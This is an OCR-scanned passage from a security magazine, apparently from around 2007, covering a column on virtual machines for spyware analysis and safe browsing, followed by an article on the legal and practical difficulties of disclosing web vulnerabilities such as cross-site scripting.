most  of  this  dissection  and  examina¬ 
tion  work  has  moved  to  the  world  of  virtual  machines.  Besides  th^ 'obvious 
savings  in  desk  space  and  power,  it’s  easier  to  figure  out  what  a  piece  of  spy- 
ware  has  done  to  a  virtual  machine  than  a  physical  machine,  because  many 
of  the  tools  of  the  virtualization  server’s  host  operating  system  can  be  used  in 
the  analysis. 

Using  a  virtual  crash-and-burn  machine  can  also  be  a  lot  faster  than  using  a 
physical  machine.  One  of  the  positively  mind-numbing  tasks  with  my  old  crash- 


and-burns  was  the  need  to  install  operating  systems 
onto  the  hard  drives,  make  “images”  of  these  hard  drives, 
restore  the  images  after  the  spyware  had  done  something 
nasty  and  so  on.  I  had  one  9GB  drive  configured  with  a 
copy  of  Windows  2000,  another  configured  with  Linux, 
and  a  lot  of  9GB  drives  holding  versions  of  these  systems 
in  various  states  of  damage  and  attack.  When  I  was  done 
experimenting  with  a  new  nasty,  I  would  take  my  refer¬ 
ence  hard  drive  and  copy  it  block-for-block  back  over  the 
work  drive.  This  assured  me  that  I  had  a  nice  clean  install 
of  the  victim  operating  system  ready  for  another  experi¬ 
ment.  But  I  had  to  boot  from  CD-ROM  and  then  spend 
between  20  and  30  minutes  to  copy  the  blocks. 

It’s  faster  to  work  with  disk  images  of  virtual  comput¬ 
ers  because  today’s  virtualization  servers  are  better  at 
intelligently  managing  hard  drives  than  physical  servers 
ever  could  be.  Instead  of  having  a  block-by-block  copy  of 
the  logical  drive,  virtualization  servers  employ  a  variety 
of  compression  and  remapping  techniques  so  that  the 
virtual  disk  contains  Jonly  the  disk  sectors  that  the  vir¬ 
tual  computer  actually  needs. 
Some  virtualization  servers, 
like  Microsoft  Virtual  PC, 
can  even  store  virtual  disks 
in  two  files:  a  “base”  or  ref¬ 
erence  file  and  a  second  file 
that  just  keeps  track  of  the 
changes.  With  this  kind 
of  configuration,  the  sec¬ 
ond  file  contains  a  perfect 
record  of  the  damage  that 
the  spyware  has  done.  To 
restore  the  original  com¬ 
puter,  you  just  throw  away 
that  second  file.  What 
could  be  easier? 

Throwaway  virtual 
machines  can  be  used  for 
a  lot  more  than  testing 
spyware.  Positively  the  saf¬ 
est  way  to  browse  the  Web 
today  is  to  download  a  copy 
of  the  VMware  Player  and  the  company’s  “Browser 
Appliance”  virtual  machine.  Start  it  up  and  within 
a  few  seconds  you’ll  have  a  virtual  machine  running 
Ubuntu  Linux  with  a  copy  of  Mozilla  Firefox  ready 
to  surf.  Firefox  running  on  Linux  is  an  extremely 
secure  configuration  for  browsing  the  Web.  And  if 
some  hacking  group  has  managed  to  find  an  exploit 
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that  allows  them  to  take  over  your  virtual 
machine,  what  do  you  care?  The  worst 
that  exploit  will  do  is  corrupt  the  virtual 
machine— there  is  no  way  for  the  hack¬ 
ers’  hostile  programs  to  break  out  of  the 
VMware  Player  and  infect  your  desktop. 
Likewise,  there  is  no  way  for  a  cross-site 
scripting  attack  to  steal  your  home  bank¬ 
ing  authentication  cookies,  and  there’s  no 
way  for  some  zero-day  exploit  to  search  for 
your  confidential  documents. 

Remote  Possibilities 

Organizations  can  also  use  the  VMware 
Player  as  a  tool  for  providing  their  employ¬ 
ees  with  a  consistent  set  of  applications  for 
their  home  computers  or  secure  remote 
access.  Instead  of  using  a  resource-inten¬ 
sive  remote-access  system  like  Citrix  or 
Microsoft  Terminal  Services,  you  could 
create  a  VMware  virtual  machine  that  is 
preconfigured  with  a  trusted  operating 
system,  all  of  your  organization’s  pro¬ 
ductivity  software  and  a  virtual  private 
network  client.  Employees  would  run  the 
virtual  machine  to  access  company  soft¬ 
ware  or  network  resources,  storing  their 
work  either  in  separate  virtual  disks,  in 
the  host  operating  system  or  on  network 
shares.  Software  updates  could  be  distrib¬ 
uted  as  whole-new  VMs. 

Increasingly,  I’m  also  seeing  VMs  as  a 
way  to  protect  myself  when  I’m  working  on 
a  sensitive  network  that  belongs  to  a  client. 
Instead  of  bringing  up  a  VPN  client  on  my 
home  computer,  I’ll  create  a  VM  and  use 
that  to  connect  to  the  client  instead.  Now 
I  can  be  sure  that  no  unrelated  activity  on 
my  desktop  will  inadvertently  make  it  into 
the  client’s  network.  Likewise,  I’m  assured 
that  any  confidential  information  I  down¬ 
load  will  be  confined  to  that  VM. 

A  number  of  academic  researchers  are 
trying  to  leverage  this  concept  into  an 
easy-to-use  desktop  interface  that  would 
partition  the  typical  home  computer  into 
different  virtual  machines  for  the  different 
kinds  of  “roles”  that  home  users  typically 
play.  For  example,  I  might  have  one  virtual 
machine  for  word  processing;  a  second  for 
doing  home  banking  and  other  high-value, 
high-risk  activities;  a  third  for  browsing 


the  Web  and  playing  games;  and  a  fourth 
for  high-risk  activities  like  running  pro¬ 
grams  that  people  send  me  by  e-mail. 

Although  many  researchers  seem  enam¬ 
ored  with  the  idea  of  using  virtualization  to 
solve  the  spyware  problem,  I  suspect  that 
such  a  system  wouldn’t  provide  nearly  as 


much  security  as  its  proponents  imagine. 
The  problem  is  that  home  users  will  surely 
want  a  way  to  move  information  between 
these  different  virtual  desktops— and  as 
soon  as  there  is  a  way  to  move  informa¬ 
tion,  attackers  might  be  able  to  exploit  it. 
For  example,  an  attacker  might  send  the 
user  an  e-mail  message  claiming  to  be 
from  his  bank,  which  contains  an  alleg¬ 
edly  “mandatory  update  to  your  secure 
home  banking  virtual  machine.”  Although 
it  is  possible  to  build  a  virtual  machine 
that  allows  no  communication  with  other 
desktop  VMs  as  a  matter  of  policy,  it’s 
unlikely  that  consumers  wall  want  to  use 
a  system  that  doesn’t  allow  cut-and-paste 
between  the  different  desktops. 

Going  to  the  Dark  Side 

Clever  security  mavens  wall  realize  that 
there’s  a  dark  side  to  all  of  this  virtual¬ 
ization  as  well.  Because  the  cookies  and 
browser  cache  files  are  stored  in  the  vir¬ 
tual  machine  along  with  everything  else, 
a  bad  guy  who  browses  the  Web  inside 
VMware’s  Browser  Appliance  won’t  leave 
any  of  those  telltale  forensic  trails  on  his 
PC.  This  can  make  it  much  harder  to  prove 
that  someone  has  been  using  a  computer 
for  illicit  purposes  such  as  downloading 
child  pornography.  At  a  recent  forensics 
conference  I  heard  that  some  sophisti¬ 
cated  attackers  are  doing  this  today  so 
that  they  won’t  leave  traces  when  they 


break  into  other  machines.  Contrary  to 
what’s  frequently  said  in  the  media,  vir¬ 
tual  machines  give  us  a  way  to  browse 
the  Web,  download  information  and  then 
completely  clean  a  machine  so  that  no 
trace  is  left  behind. 

Virtualization  technology  can  also  be 


used  by  attackers  to  hide  the  existence  of 
viruses,  Trojan  horses  and  other  kinds  of 
malware,  although  currently  such  attacks 
are  strictly  in  the  proof-of-concept  phase. 
The  theory  here  is  that  the  malware 
becomes  the  virtualization  server  itself;  the 
victim  operating  system  then  runs  as  the  cli¬ 
ent.  To  date  the  only  person  who  has  been 
able  to  pull  this  off  is  Joanna  Rutkowska, 
a  researcher  at  Coseinc,  a  Singapore-based 
IT  security  consultancy.  Rutkowska’s  cre¬ 
ation,  called  “Blue  Pill,”  was  the  subject 
of  much  media  hype  last  summer  when  it 
was  first  announced.  The  system  is  based 
on  AMD’s  SVM/Pacifica  virtualization 
technology  and  reportedly  can  fool  even 
Windows  Vista  x64.  You’ll  get  a  more  real¬ 
istic  understanding  of  what  the  technol¬ 
ogy  can  and  cannot  do  by  paging  through 
Rutkowska’s  Black  Hat  PowerPoint  presen¬ 
tation,  which  you  can  download  from  her 
blog  at  www.invisiblethings.org. 

Virtualization  is  likely  to  be  as  big  a 
step  forward  for  computer  security  as  pro- 
tected-mode  operating  systems  were  back 
in  the  1970s  in  academia  and  government 
(and  in  the  1990s,  when  business  made 
the  transition  from  DOS  and  Windows 
95  to  Windows  NT).  It  won’t  be  a  cure-all, 
but  then  again,  nothing  ever  is.  ■ 


Simson  Garfinkel,  CISSP,  is  researching  computer 
forensics  and  human  thought  at  Harvard  University. 
Send  feedback  to  machineshop  a  cxo.com. 


Organizations  can  also  use  the  VMware 
Player  as  a  tool  for  providing  their 
employees  with  a  consistent  set  of 
applications  for  their  home  computers  or 
secure  remote  access. 
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creating  software  vulnerabilities 
easier,  disclosing  them  more 
difficult  and  discovering  them 
possibly  illegal 

BY  SCOTT  BERINATO 


How  the  Web  makes 


CHILLING 

EFFECT 


A  DISILLUSIONED  SAMARITAN 


ast  February  at  Purdue  University,  a  stu¬ 
dent  taking  “cs390s— Secure  Computing” 
told  his  professor,  Dr.  Pascal  Meunier,  that 
a  Web  application  he  used  for  his  physics 
class  seemed  to  contain  a  serious  vulner¬ 
ability  that  made  the  app  highly  insecure. 


Such  a  discovery  didn’t  surprise  Meunier.  “It’s  a  secure 
computing  class;  naturally  students  want  to  discover  vul¬ 
nerabilities.” 

They  probably  want  to  impress  their  prof,  too,  who’s  a 
fixture  in  the  vulnerability  discovery  and  disclosure  world. 
Dr.  Meunier  has  created  software  that  interfaces  with 
vulnerability  databases.  He  created  ReAssure,  a  kind  of 
vulnerability  playground,  a  safe  computing  space  to  test 
exploits  and  perform  what  Meunier  calls  “logically  destruc¬ 
tive  experiments.”  He  sits  on  the  board  of  editors  for  the 
Common  Vulnerabilities  and  Exposures  (CVE)  service,  the 
definitive  dictionary  of  all  confirmed  software  bugs.  And 
he  has  managed  the  Vulnerabilities  Database  and  Incident 
Response  Database  projects  at  Purdue’s  Center  for  Educa¬ 
tion  and  Research  in  Information  and  Assurance,  or  Cerias, 
an  acronym  pronounced  like  the  adjective  that  means  “no 
joke.” 

When  the  undergraduate  approached  Meunier,  the 
professor  sensed  an  educational  opportunity  and  didn’t 
hesitate  to  get  involved.  “We  wanted  to  be  good  citizens 
and  help  prevent  the  exploit  from  being  used,”  he  says.  In 
the  context  of  vulnerable  software,  it  would  be  the  last  time 


Meunier  decided  to  be  a  good  citizen. 


IN  THIS  STORY  The  rules  of 
responsible  disclosure  The  rise 
of  cross-site  scripting  New  legal 
risks  for  security  research 


Meunier  notified  the  authors  of  the  phys¬ 
ics  department  application  that  one  of  his 
students— he  didn’t  say  which  one— had 
found  a  suspected  flaw,  “and  their  response 
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Software  Security 


was  beautiful,”  says  Meunier.  They  found, 
verified  and  fixed  the  bug  right  away,  no 
questions  asked. 

But  two  months  later,  in  April,  the  same 
physics  department  website  was  hacked.  A 
detective  approached  Meunier,  whose  name 
was  mentioned  by  the  staff  of  the  vulnerable 
website  during  questioning.  The  detective 
asked  Meunier  for  the  name  of  the  student 
who  had  discovered  the  February  vulnera¬ 
bility.  The  self-described  “stubborn  idealist” 
Meunier  refused  to  name  the  student.  He 
didn’t  believe  it  was  in  that  student’s  char¬ 
acter  to  hack  the  site  and,  furthermore,  he 
didn’t  believe  the  vulnerability  the  student 
had  discovered,  which  had  been  fixed,  was 
even  connected  to  the  April  hack. 

The  detective  pushed  him.  Meunier 
recalls  in  his  blog:  “I  was  quickly  threatened 
with  the  possibility  of  court  orders,  and  the 
number  of  felony  counts  in  the  incident  was 
brandished  as  justification  for  revealing  the 
name  of  the  student.”  Meunier’s  stomach 
knotted  when  some  of  his  superiors  sided 
with  the  detective  and  asked  him  to  turn 
over  the  student.  Meunier  asked  himself: 
“Was  this  worth  losing  my  job?  Was  this 
worth  the  hassle  of  responding  to  court 
orders,  subpoenas,  and  possibly  having  my 
computers  (work  and  personal)  seized?” 
Later,  Meunier  recast  the  downward  spiral 
of  emotions:  “I  was  miffed,  uneasy,  disillu¬ 
sioned.” 

This  is  not  good  news  for  vulnerability 
research,  the  game  of  discovering  and  dis¬ 
closing  software  flaws.  True,  discovery  and 
disclosure  always  have  been  contentious 
topics  in  the  information  security  ranks.  For 
many  years,  no  calculus  existed  for  when 
and  how  to  ethically  disclose  software  vul¬ 
nerabilities.  Opinions  varied  on  who  should 
disclose  them,  too.  Disclosure  was  a  philo¬ 
sophical  problem  with  no  one  answer  but 
rather,  schools  of  thought.  Public  sham¬ 
ing  adherents  advised  security  research¬ 
ers,  amateurs  and  professionals  alike  to  go 
public  with  software  flaws  early  and  often 
and  shame  vendors  into  fixing  their  flawed 
code.  Back-channel  disciples  believed  in 
a  strong  but  limited  expert  community  of 
researchers  working  with  vendors  behind 
the  scenes.  Many  others’  disclosure  tenets 


fell  in  between. 

Still,  in  recent  years,  with  shrink- 
wrapped  software,  the  community  has 
managed  to  develop  a  workable  disclosure 
process.  Standard  operating  procedures 
for  discovering  bugs  have  been  accepted 
and  guidelines  for  disclosing  them  to  the 
vendor  and  the  public  have  fallen  into  place, 
and  they  have  seemed  to  work.  Economists 
have  even  proved  a  correlation  between 
what  they  call  “responsible  disclosure”  and 
improved  software  security. 

But  then,  right  when  security  research¬ 
ers  were  getting  good  at  the  disclosure  game, 
the  game  changed.  The  most  critical  code 
moved  to  the  Internet,  where  it  was  highly 
customized  and  constantly  interacting  with 
other  highly  customized  code.  And  all  this 
Web  code  changed  often,  too,  sometimes 
daily.  Vulnerabilities  multiplied  quickly. 
Exploits  followed. 

But  researchers  had  no  counterpart 
methodology  for  disclosing  Web  vulnera¬ 
bilities  that  mirrored  the  system  for  vulner¬ 
ability  disclosure  in  off-the-shelf  software. 
It’s  not  even  clear  what  constitutes  a  vulner¬ 
ability  on  the  Web.  Finally,  and  most  seri¬ 
ous,  legal  experts  can’t  yet  say  whether  it’s 
even  legal  to  discover  and  disclose  vulner¬ 
abilities  on  Web  applications  like  the  one 
that  Meunier’s  student  found. 

To  Meunier’s  relief,  the  student  volun¬ 
teered  himself  to  the  detective  and  was 
quickly  cleared.  But  the  effects  of  the  epi¬ 
sode  are  lasting.  If  it  had  come  to  it,  Meunier 
says,  he  would  have  named  the  student  to 
preserve  his  job,  and  he  hated  being  put  in 
that  position.  “Even  if  there  turn  out  to  be 
zero  legal  consequences”  for  disclosing  Web 
vulnerabilities,  Meunier  says,  “the  incon¬ 
venience,  the  threat  of  being  harassed  is 
already  a  disincentive.  So  essentially  now 
my  research  is  restricted.” 

He  ceased  using  disclosure  as  a  teach¬ 
ing  opportunity  as  well.  Meunier  wrote 
a  five-point  don’t-ask-don’t-tell  plan  he 
intended  to  give  to  cs390s  students  at  the 
beginning  of  each  semester.  If  they  found  a 
Web  vulnerability,  no  matter  how  serious  or 
threatening,  Meunier  wrote,  he  didn’t  want 
to  hear  about  it.  Furthermore,  he  said  stu¬ 
dents  should  “delete  any  evidence  you  knew 


about  this  problem. ..go  on  with  your  life,” 
although  he  later  amended  this  advice  to 
say  students  should  report  vulnerabilities 
to  CERT/CC. 

A  gray  pall,  a  palpable  chilling  effect 
has  settled  over  the  security  research  com¬ 
munity.  Many,  like  Meunier,  have  decided 
that  the  discovery  and  disclosure  game  is 
not  worth  the  risk.  The  net  effect  of  this  is 
fewer  people  with  good  intentions  willing 
to  cast  a  necessary  critical  eye  on  software 
vulnerabilities.  That  leaves  the  malicious 
ones,  unconcerned  by  the  legal  or  social 
implications  of  what  they  do,  as  the  domi¬ 
nant  demographic  still  looking  for  Web 
vulnerabilities. 

THE  RISE  OF 

RESPONSIBLE 

DISCLOSURE 

IN  TH  E  same  way  that  light  baffles  physi¬ 
cists  because  it  behaves  simultaneously 
like  a  wave  and  a  particle,  software  baffles 
economists  because  it  behaves  simulta¬ 
neously  like  a  manufactured  good  and  a 
creative  expression.  It’s  both  product  and 
speech.  It  carries  the  properties  of  a  car  and 
a  novel  at  the  same  time.  With  cars,  manu¬ 
facturers  determine  quality  largely  before 
they’re  released  and  the  quality  can  be 
proven,  quantified.  Either  it  has  air  bags  or 
it  doesn’t.  With  novels  (the  words,  not  the 
paper  stock  and  binding),  quality  depends 
on  what  consumers  get  versus  what  they 
want.  It  is  subjective  and  determined  after 
the  book  has  been  released.  Moby-Dick  is 
a  high-quality  creative  venture  to  some 
and  poor  quality  to  others.  At  any  rate,  this 
creates  a  paradox.  If  software  is  both  scien¬ 
tifically  engineered  and  creatively  conjured, 
its  quality  is  determined  both  before  and 
after  it’s  released  and  is  both  provable  and 
unprovable. 

In  fact,  says  economist  Ashish  Arora  at 
Carnegie  Mellon  University,  it  is  precisely 
this  paradox  that  leads  to  a  world  full  of 
vulnerable  software.  “I’m  an  economist  so  I 
ask  myself,  Why  don’t  vendors  make  higher 
quality  software?”  After  all,  in  a  free  market, 
all  other  things  being  equal,  a  better  engi¬ 
neered  product  should  win  over  a  lesser  one 
with  rational  consumers.  But  with  software, 
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lesser-quality  products,  requiring  massive 
amounts  of  repair  post-release,  dominate. 
“The  truth  is,  as  a  manufactured  good,  it’s 
extraordinarily  expensive  [and]  time- 
consuming  [to  make  it  high  quality] .”  At  the 
same  time,  as  a  creative  expression,  making 
“quality”  software  is  as  indeterminate  as  the 
next  best-seller.  “People  use  software  in  so 
many  ways,  it’s  very  difficult  to  anticipate 
what  they  want. 

“It’s  terrible  to  say,”  Arora  concedes,  “but 
in  some  ways,  from  an  economic  perspec¬ 
tive,  it’s  more  efficient  to  let  the  market  tell 
you  the  flaws  once  the  software  is  out  in  the 
public.”  The  same  consumers  who  complain 
about  flawed  software,  Arora  argues,  would 
neither  wait  to  buy  the  better  software 
nor  pay  the  price  premium  for  it  if  more- 
flawed,  less-expensive  software  were  avail¬ 
able  sooner  or  at  the  same  time.  True,  code 
can  be  engineered  to  be  more  secure.  But 
as  long  as  publishing  vulnerable  software 


remains  legal,  vulnerable  software  will  rule 
because  it’s  a  significantly  more  efficient 
market  than  the  alternative,  high-security, 
low-flaw  market. 

The  price  consumers  pay  for  supporting 
cheaper,  buggy  software  is  they  become  an 
ad  hoc  quality  control  department.  They 
suffer  the  consequences  when  software 
fails.  But  vendors  pay  a  price,  too.  By  letting 
the  market  sort  out  the  bugs,  vendors  have 
ceded  control  over  who  looks  for  flaws  in 
their  software  and  how  flaws  are  disclosed 
to  the  public.  Vendors  can’t  control  how, 
when  or  why  a  bug  is  disclosed  by  a  public 
full  of  people  with  manifold  motivations 
and  ethics.  Some  want  notoriety.  Some  use 
disclosure  for  corporate  marketing.  Some 
do  it  for  a  fee.  Some  have  collegial  inten¬ 
tions,  hoping  to  improve  software  quality 
through  community  efforts.  Some  want  to 
shame  the  vendor  into  patching  through 
bad  publicity.  And  still  others  exploit  the 


vulnerabilities  to  make  money  illicitly  or 
cause  damage. 

“Disclosure  is  one  of  the  main  ethi¬ 
cal  debates  in  computer  security,”  says 
researcher  Steve  Christey.  “There  are  so 
many  perspectives,  so  many  competing 
interests,  that  it  can  be  exhausting  to  try 
and  get  some  movement  forward.” 

What  this  system  created  was  a  kind  of 
free-for-all  in  the  disclosure  bazaar.  Dis¬ 
covery  and  disclosure  took  place  without 
any  controls.  Hackers  traded  information 
on  flaws  without  informing  the  vendors. 
Security  vendors  built  up  entire  teams  of 
researchers  whose  job  was  to  dig  up  flaws 
and  disclose  them  via  press  release.  Some 
told  the  vendors  before  going  public.  Oth¬ 
ers  did  not.  Freelance  consultants  looked 
for  major  flaws  to  make  a  name  for  them¬ 
selves  and  drum  up  business.  Sometimes 
these  flaws  were  so  esoteric  that  they  posed 
minimal  real-world  risk,  but  the  researcher 
might  not  mention  that.  Sometimes  the 
flaws  were  indeed  serious,  but  the  vendor 
would  try  to  downplay  them.  Still  other 
researchers  and  amateur  hackers  tried  to  do 
the  right  thing  and  quietly  inform  vendors 
when  they  found  holes  in  code.  Sometimes 
the  vendors  chose  to  ignore  them  and  hope 
security  by  obscurity  would  protect  them. 
Sometimes,  Arora  alleges,  vendors  paid 
mercenaries  and  politely  asked  them  to 
keep  it  quiet  while  they  worked  on  a  fix. 

Vulnerability  disclosure  came  to  be 
thought  of  as  a  messy,  ugly,  necessary  evil. 
The  madness  crested,  famously,  at  the  Black 
Hat  hacker  conference  in  Las  Vegas  in  2005, 
when  a  researcher  named  Michael  Lynn 
prepared  to  disclose  to  a  room  full  of  hack¬ 
ers  and  security  researchers  serious  flaws  in 
Cisco’s  IOS  software,  the  code  that  controls 
many  of  the  routers  on  the  Internet.  His 
employer,  ISS  (now  owned  by  IBM)  warned 
him  not  to  disclose  the  vulnerabilities.  So  he 
quit  his  job.  Cisco  in  turn  threatened  legal 
action  and  ordered  workers  to  tear  out  pages 
from  the  conference  program  and  destroy 
conference  CDs  that  contained  Lynn’s  pre¬ 
sentation.  Hackers  accused  Cisco  of  spin 
and  censorship.  Vendors  accused  hackers 
of  unethical  and  dangerous  speech.  In  the 
end,  Lynn  gave  his  presentation.  Cisco  sued. 
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Cross-site  scripting  has 
shot  up  the  list  of  most 
common  vulnerabilities 

■  CROSS-SITE  SCRIPTING 

■  BUFFER  OVERFLOWS 
SQL  INJECTION 

■  DIRECTORY  TRAVERSAL 
PHP  INCLUDE 

SOURCE:  US  CERT  COMMON  VULNERABILITIES  AND  EXPOSURES 
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Lynn  settled  and  agreed  not  to  talk  about 
it  anymore. 

The  confounding  part  of  all  the  grand- 
standing,  though,  was  how  unnecessary 
it  was.  In  fact,  as  early  as  2000,  a  hacker 
known  as  Rain  Forest  Puppy  had  written  a 
draft  proposal  for  how  responsible  disclo¬ 
sure  could  work.  In  2002,  researchers  Chris 
Wysopal  and  Christey  picked  up  on  this 
work  and  created  a  far  more  detailed  pro¬ 
posal.  Broadly,  it  calls  for  a  week  to  establish 
contact  between  the  researcher  finding  a 
vulnerability  and  a  vendor’s  predetermined 
liaison  on  vulnerabilities.  Then  it  gives  the 
vendor,  as  a  general  guideline,  30  days  to 
develop  a  fix  and  report  it  to  the  world 
through  proper  channels.  It’s  a  head-start 
program,  full  disclosure— delayed.  It  posits 
that  a  vulnerability  will  inevitably  become 
public,  so  here’s  an  opportunity  to  create  a 
fix  before  that  happens,  since  the  moment 
it  does  become  public  the  risk  of  exploit 
increases.  Wysopal  and  Christey  submitted 
the  draft  to  the  IETF  (Internet  Engineer¬ 
ing  Task  Force),  where  it  was  well-received 
but  not  adopted  because  it  focused  more  on 
social  standards,  not  technical  ones. 

Still,  its  effects  were  lasting,  and  by 
2004,  many  of  its  definitions  and  tenets 
had  been  folded  into  the  accepted  disclo¬ 
sure  practices  for  shrink-wrapped  software. 
By  the  time  Lynn  finally  took  the  stage  and 
disclosed  Cisco’s  vulnerabilities,  US-CERT, 
Mitre’s  CVE  dictionary  (Christey  is  editor), 
and  Department  of  Homeland  Security 
guidelines  all  used  large  swaths  of  Wyso- 
pal’s  and  Christey’s  work. 

Recently,  economist  Arora  conducted 
several  detailed  economic  and  mathemati¬ 
cal  studies  on  disclosure,  one  of  which 
seemed  to  prove  that  vendors  patch  soft¬ 
ware  faster  when  bugs  are  reported  through 
this  system.  For  packaged  software,  respon¬ 
sible  disclosure  works. 

FROM  BUFFER 
OVERFLOWS  TO  CROSS¬ 
SITE  SCRIPTING 

THREE  VULNERABILITIES  that 
followed  the  responsible  disclosure  process 
recently  are  CVE-2006-3873,  a  buffer  over¬ 
flow  in  an  Internet  Explorer  DLL  file;  CVE- 


2006-3961,  a  buffer  overflow  in  an  Active 
X  control  in  a  McAfee  product;  and  CVE- 
2006-4565,  a  buffer  overflow  in  the  Firefox 
browser  and  Thunderbird  e-mail  program. 
It’s  not  surprising  that  all  three  are  buffer 
overflows.  With  shrink-wrapped  software, 
buffer  overflows  have  been  for  years  the 
predominant  vulnerability  discovered  and 
exploited. 

But  shrink-wrapped,  distributable 
software,  while  still  proliferating  and  still 
being  exploited,  is  a  less  desirable  target  for 
exploiters  than  it  once  was.  This  isn’t  because 
shrink-wrapped  software  is  harder  to  hack 
than  it  used  to  be— the  number  of  buffer 
overflows  discovered  has  remained  steady 
for  half  a  decade,  according  to  the  CVE  (see 
chart  on  Page  21).  Rather,  it’s  because  web¬ 
sites  have  even  more  vulnerabilities  than 
packaged  software,  and  Web  vulnerabilities 
are  as  easy  to  discover  and  hack  and,  more 
and  more,  that’s  where  hacking  is  most 
profitable.  In  military  parlance,  webpages 
provide  a  target-rich  environment. 

The  speed  with  which  Web  vulnerabili¬ 
ties  have  risen  to  dominate  the  vulnerability 
discussion  is  startling.  Between  2004  and 
2006,  buffer  overflows  dropped  from  the 
number-one  reported  class  of  vulnerability 
to  number  four.  Counter  to  that,  Web  vul¬ 
nerabilities  shot  past  buffer  overflows  to 
take  the  top  three  spots.  The  number-one 
reported  vulnerability,  cross-site  scripting 
(XSS)  comprised  one  in  five  of  all  CVE- 
reported  bugs  in  200 6. 

To  understand  XSS  is  to  understand  why, 
from  a  technical  perspective,  it  will  be  so 
hard  to  apply  responsible  disclosure  prin¬ 
ciples  to  Web  vulnerabilities. 

Cross-site  scripting  (which  is  something 
of  a  misnomer)  uses  vulnerabilities  in  web¬ 
pages  to  insert  code,  or  scripts.  The  code  is 
injected  into  the  vulnerable  site  unwittingly 
by  the  victim,  who  usually  clicks  on  a  link 
that  has  HTML  and  JavaScript  embedded 
in  it.  (Another  variety,  less  common  and 
more  serious,  doesn’t  require  a  click).  The 
link  might  promise  a  free  iPod  or  simply 
seem  so  innocuous,  a  link  to  a  news  story, 
say,  that  the  user  won’t  deem  it  dangerous. 
Once  clicked,  though,  the  embedded  exploit 
executes  on  the  targeted  website’s  server. 


The  scripts  will  usually  have  a  malicious 
intent— from  simply  defacing  the  website  to 
stealing  cookies  or  passwords,  or  redirecting 
the  user  to  a  fake  webpage  embedded  in  a 
legitimate  site,  a  high-end  phishing  scheme 
that  affected  PayPal  last  year.  A  buffer  over¬ 
flow  targets  an  application.  But  XSS  is,  as 
researcher  Jeremiah  Grossman  (founder  of 
WhiteHat  Security)  puts  it,  “an  attack  on 
the  user,  not  the  system.”  It  requires  the  user 
to  visit  the  vulnerable  site  and  participate  in 
executing  the  code. 

This  is  reason  number  one  it’s  harder  to 
disclose  Web  vulnerabilities.  What  exactly 
is  the  vulnerability  in  this  XSS  scenario? 
Is  it  the  design  of  the  page?  Yes,  in  part. 
But  often,  it’s  also  the  social  engineering 
performed  on  the  user  and  his  browser.  A 
hacker  who  calls  himself  RSnake  and  who’s 
regarded  in  the  research  community  as  an 
expert  on  XSS  goes  even  further,  saying, 
“[XSS  is]  a  gateway.  All  it  means  is  I  can 
pull  some  code  in  from  somewhere.”  In 
some  sense  it  is  like  the  door  to  a  house.  Is 
a  door  a  vulnerability?  Or  is  it  when  it’s  left 
unlocked  that  it  becomes  a  vulnerability? 
When  do  you  report  a  door  as  a  weakness— 
when  it’s  just  there,  when  it’s  left  unlocked, 
or  when  someone  illegally  or  unwittingly 
walks  through  it?  In  the  same  way,  it’s  possi¬ 
ble  to  argue  that  careless  users  are  as  much 
to  blame  for  XSS  as  software  flaws.  For  the 
moment,  let’s  treat  XSS,  the  ability  to  inject 
code,  as  a  technical  vulnerability. 

Problem  number  two  with  disclosure 
of  XSS  is  its  prevalence.  Grossman,  who 
founded  his  own  research  company,  White 
Hat,  claims  XSS  vulnerabilities  can  be 
found  in  70  percent  of  websites.  RSnake 
goes  further.  “I  know  Jeremiah  says  seven 
of  10.  I’d  say  there’s  only  one  in  30  I  come 
across  where  the  XSS  isn’t  totally  obvious. 
I  don’t  know  of  a  company  I  couldn’t  break 
into  [using  XSS].” 

If  you  apply  Grossman’s  number  to  a 
recent  Netcraft  survey,  which  estimated 
that  there  are  close  to  100  million  websites, 
you’ve  got  70  million  sites  with  XSS  vulner¬ 
abilities.  Repairing  them  one-off,  two-off, 
200,000-off  is  spitting  in  the  proverbial 
ocean.  Even  if  you’ve  disclosed,  you’ve  done 
very  little  to  reduce  the  overall  risk  of  exploit. 
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“Logistically,  there’s  no  way  to  disclose  this 
stuff  to  all  the  interested  parties,”  Grossman 
says.  “I  used  to  think  it  was  my  moral  pro¬ 
fessional  duty  to  report  every  vulnerability, 
but  it  would  take  up  my  whole  day.” 

What’s  more,  new  XSS  vulnerabilities 
are  created  all  the  time,  first  because  many 


a  Web  session— how  the  site  is  configured 
and  updated,  how  the  browser  is  visiting 
the  site  configured  to  interact  with  the 
site— that  vulnerabilities  to  some  extent 
become  a  function  of  complexity.  They  may 
affect  some  subset  of  users— people  who  use 
one  browser  over  another,  say.  When  it’s  dif- 


a  nasty  tool.” 

If  that  first  post  didn’t  serve  as  a  wake- 
up  call,  what  followed  it  should.  Hundreds 
of  XSS  vulnerabilities  were  disclosed  by  the 
regular  klatch  of  hackers  at  the  site.  Most 
exploited  well-known,  highly  trafficked 
sites.  Usually  the  posts  included  a  link 


the  hacker:  “In  some  ways  there  is 
no  hope.  I’m  not  comfortable  telling 
companies  that  I  know  how  to  protect 

them  from  this.”  -“RSnake,”  founder,  Sla.ckers.org 


programming  languages  have  been  made  so 
easy  to  use  that  amateurs  can  rapidly  build 
highly  insecure  webpages.  And  second 
because,  in  those  slick,  dynamic  pages  com¬ 
monly  marketed  as  “Web  2.0,”  code  is  both 
highly  customized  and  constantly  changing, 
says  Wysopal,  who  is  now  CTO  of  VeriCode. 
“For  example,  look  at  IIS  [Microsoft’s  shrink- 
wrapped  Web  server  software],”  he  says. 
“For  about  two  years  people  were  hammer¬ 
ing  on  that  and  disclosing  all  kinds  of  flaws. 
But  in  the  last  couple  of  years,  there  have 
been  almost  no  new  vulnerabilities  with 
IIS.  It  went  from  being  a  dog  to  one  of  the 
highest  security  products  out  there.  But  it 
was  one  code  base  and  lots  of  give-and-take 
between  researchers  and  the  vendor,  over 
and  over. 

“On  the  Web,  you  don’t  have  that  give 
and  take,”  he  says.  You  can’t  continually 
improve  a  webpage’s  code  because  “Web 
code  is  highly  customized.  You  won’t  see  the 
same  code  on  two  different  banking  sites, 
and  the  code  changes  all  the  time.” 

That  means,  in  the  case  of  Web  vulnera¬ 
bilities,  says  Christey,  “every  input  and  every 
button  you  can  press  is  a  potential  place  to 
attack.  And  because  so  much  data  is  mov¬ 
ing  you  can  lose  complete  control.  Many  of 
these  vulnerabilities  work  by  mixing  code 
where  you  expect  to  mix  it.  It  creates  flex¬ 
ibility  but  it  also  creates  an  opportunity  for 
hacking.” 

There  are  in  fact  so  many  variables  in 


ficult  to  even  recreate  the  set  of  variables 
